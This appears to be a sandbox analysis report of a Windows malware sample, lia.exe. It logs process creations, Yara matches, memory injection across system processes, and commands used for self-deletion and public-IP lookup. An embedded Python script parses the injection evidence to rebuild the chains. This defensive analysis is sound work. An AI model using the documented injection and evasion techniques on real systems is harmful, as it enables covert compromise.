Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP" |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1" |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: C:\Users\user\Desktop\lia.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0 |
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00 |
Source: RuntimeBroker.exe, 00000021.00000000.563490355.0000021DB5A53000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}> |
Source: RuntimeBroker.exe, 00000024.00000000.640630745.0000021910A2A000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l |
Source: mshta.exe, 0000000B.00000003.423217219.000002480E9FE000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ |
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-; |
Source: explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G |
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0 |
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 5D0000 |
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 5EA000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 850000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 5E8000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: A90000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 215F44A0000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF4000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A650000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: ECB1F3A000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: D9724C4000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3300000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0 |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
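The "Memory written" and "Memory protected" evidence above can be read mechanically. The following Python script is an added example, not part of the sandbox report: it parses the report's own lines (a subset is embedded as sample input), rebuilds the chain of processes each injector wrote into, and flags addresses that were both written and flipped from execute-read-write back to execute-read, the write-patch-restore sequence typical of an inline hook placed in an already-mapped image. The region_hint() heuristic (addresses at or above 0x7FF000000000 treated as image mappings) and the reading of the 7FFD88E31580 writes as a patched page inside a system DLL are the analyst's assumptions, not findings stated by the report.

```python
"""Rebuild the process-injection chain from Joe Sandbox "Memory written" /
"Memory protected" evidence lines.  Added example: REPORT_LINES is a subset
copied from the report on this page, not a live sandbox feed."""
import re
from collections import defaultdict

# Sample input: a representative subset of the report lines on this page.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0 |
Source: C:\Users\user\Desktop\lia.exe | Memory written: C:\Windows\System32\control.exe base: 5D0000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 5EA000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 5E8000 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0 |
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 215F44A0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 |
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3300000 |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute read |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write |
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read |
""".strip().splitlines()

WRITE_RE = re.compile(
    r"^Source: (?P<src>.+?) \| Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-F]+) \|$")
PROT_RE = re.compile(
    r"^Source: (?P<src>.+?) \| Memory protected: (?P<dst>.+?) base: (?P<base>[0-9A-F]+) "
    r"protect: (?P<prot>.+?) \|$")


def _name(path):
    """Image name only; the report gives full paths."""
    return path.rsplit("\\", 1)[-1]


def parse_events(lines):
    """Return (writes, protects): (src, dst, base) and (src, dst, base, protection)."""
    writes, protects = [], []
    for line in lines:
        m = WRITE_RE.match(line.strip())
        if m:
            writes.append((_name(m["src"]), _name(m["dst"]), m["base"]))
            continue
        m = PROT_RE.match(line.strip())
        if m:
            protects.append((_name(m["src"]), _name(m["dst"]), m["base"], m["prot"]))
    return writes, protects


def injection_graph(writes):
    """Directed edges injector -> target, ignoring a process writing to itself."""
    graph = defaultdict(set)
    for src, dst, _ in writes:
        if src != dst:
            graph[src].add(dst)
    return graph


def injection_chains(writes, root):
    """Every maximal write path starting at `root`, children in sorted order."""
    graph = injection_graph(writes)
    chains = []

    def walk(node, path):
        nxt = sorted(graph.get(node, set()) - set(path))  # no cycles
        if not nxt:
            chains.append(tuple(path))
        for child in nxt:
            walk(child, path + [child])

    walk(root, [root])
    return chains


def patched_code_sites(writes, protects):
    """(target, base) pairs that one injector wrote AND toggled RWX -> RX:
    the write-patch-restore pattern of an inline hook in a mapped image."""
    seen = defaultdict(set)
    for src, dst, base, prot in protects:
        seen[(src, dst, base)].add(prot)
    sites = set()
    for key in set(writes):
        prots = seen.get(key, set())
        if {"page execute and read and write", "page execute read"} <= prots:
            sites.add((key[1], key[2]))
    return sorted(sites)


def region_hint(base_hex):
    """Assumed x64 layout: image (EXE/DLL) mappings live at or above
    0x7FF000000000 under ASLR; lower addresses are heap/private allocations."""
    return "image-range" if int(base_hex, 16) >= 0x7FF000000000 else "private/heap"


if __name__ == "__main__":
    writes, protects = parse_events(REPORT_LINES)
    for chain in injection_chains(writes, "lia.exe"):
        print(" -> ".join(chain))
    for target, base in patched_code_sites(writes, protects):
        print(f"patched code in {target} at 0x{base} ({region_hint(base)})")
```

Run as-is it prints the three chains rooted at lia.exe (via control.exe into explorer.exe, then RuntimeBroker.exe and cmd.exe, and into rundll32.exe) and the two patched sites. The same address 7FFD88E31580 in both explorer.exe and RuntimeBroker.exe is consistent with a system DLL mapped at the same base in every process for the lifetime of a boot, which is why the script keys on (target, base) rather than on the injector. The VMware device strings listed earlier come from explorer.exe, RuntimeBroker.exe and mshta.exe memory; those processes hold PnP device names in normal operation, so the script ignores them, and they should be read as an artifact of the analysis environment rather than as proof that the sample queried the hardware.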
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.493442735.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.558340773.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.517558095.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.507991039.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.533591545.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491157547.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.521122130.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527432058.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.543730981.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495158244.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: Progman |
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: &Program Manager |
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp | Binary or memory string: Progmanlock |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
